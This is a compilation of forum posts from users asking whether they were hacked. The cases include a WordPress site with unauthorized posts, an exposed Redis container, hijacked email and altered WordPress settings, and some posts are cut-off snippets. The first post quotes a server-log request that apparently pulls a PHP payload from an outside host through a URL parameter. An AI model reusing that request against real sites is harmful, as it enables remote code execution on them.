security – My site appears to be hacked?

I recently found some random posts have been made from one of our user’s account without the user’s consent. We checked vividly with the security plugins but didn’t found anything. While we checked our Server Logs we found something like /ajax-index.php?url=http://majoydiego.com/wp-includes/css/dist/components/style.css

This URL contains a PHP payload.

Can anyone help me understand what is this code exactly and how the hacker gets access to my user and able to post? Though I uninstalled all those plugins and tried to secure as much as possible. But I am still worried!!!

network – Have I been hacked ( netstat output too many dgrams and stream connections)

enter image description here

enter image description here

netstat output

These are the output images of the netstat command I ran it shows that they’re are too many outbound connection and many dgrams and stream . I also tried to capture the output using Wireshark and then reverse checking the IP address to whom does it belongs ( using www.arin.net) it showed up various organisation ( Google, Astricia).

I also tried to turnoff the wifi and then ran netstat but no change in the dgram and stream connections.

Please help , any input will be appreciated.

Redis docker container has been hacked, next steps?

I accidentally left the port of my redis container open and noticed, that it crashed all the time today.

Now the mounted volume is full of files like red2.so, admin, root, www, apache, backup.db.

I closed the port, deleted the files and rebuild the docker container, is there a risk of my server outside of the container being infected?

There are no new or altered entries in crontab or the .ssh/authorized_keys file, but I’m not sure what I should check additionally.

[my] Inmotionhosting Email Hacked

I had multiple email accounts hacked across multiple hosting accounts. The hacker got into my email account and replied to all my emails wit… | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1816612&goto=newpost

mysql – Three of my WordPress sites got hacked, trying to understand how and how to prevent it

Today I noticed three of my WordPress sites were hacked and were redirecting visitors to other sites. It took me a while to figure out what exactly was changed. Apparently, “siteurl” and “home” were changed in the wp_options table.

I’m not entirely sure which version of WordPress these specific sites used, but since I check for a new WordPress version at least once a month, it must have been 5.4.x. Oddly enough, one of the hacked sites says it’s using v4.9.8. I can’t (easily) check the others since I have not yet gained control of the Dashboard.

So how did this happen? Was this a known vulnerability in WordPress or perhaps one of its plugins? How can I investigate this further?

Edit:
I also just noticed most (if not all) posts have been changed and also redirect to other sites.

Edit 2:
I checked all WordPress files and none were world-writable but I did see one glaring mistake I made and which all hacked sites had in common. Of all those three sites I edited wp-config.php by hand leaving a world-readable backup (wp-config.php~) behind. This file contains the WP database’s user and password. But I still don’t understand how they used that to change the database. How did they gain access to MySql?

WHT Hacked?

Hey Everyone.

While searching a topic, Google presented me with this link (https-www-ukfast-co-uk/hosting-news/webhosting-talk-hacked-htm… | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1815114&goto=newpost

email – Hacked E-Mail?? Yahoo

Problem: When someone REPLIES to an e mail I sent, the name of the TO is my correct name ( this is what that sender sees ) , but the email address is NOT MINE. Ergo, when someone replies to my email, it goes to another person’s e-mail so I don’t even get it.

EXAMPLE: My name IS JOHN SMITH

My ” JOHN SMITH ” e mail Address is johnsmith@provider.com BUT next to my real name,
JOHN SMITH, IS Another’s e-mail address. So, it is:

JOHN SMITH 12345@PROVIDER.COM When it should be JOHN SMITH johnsmith@provider.com

Ransomware demands for site that was NEVER hacked.

[COLOR=#333230][FONT=Tahoma]I’m just curious how many members and guests here get ransomware demands on websites that were NEVER hacked? Do … | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1814990&goto=newpost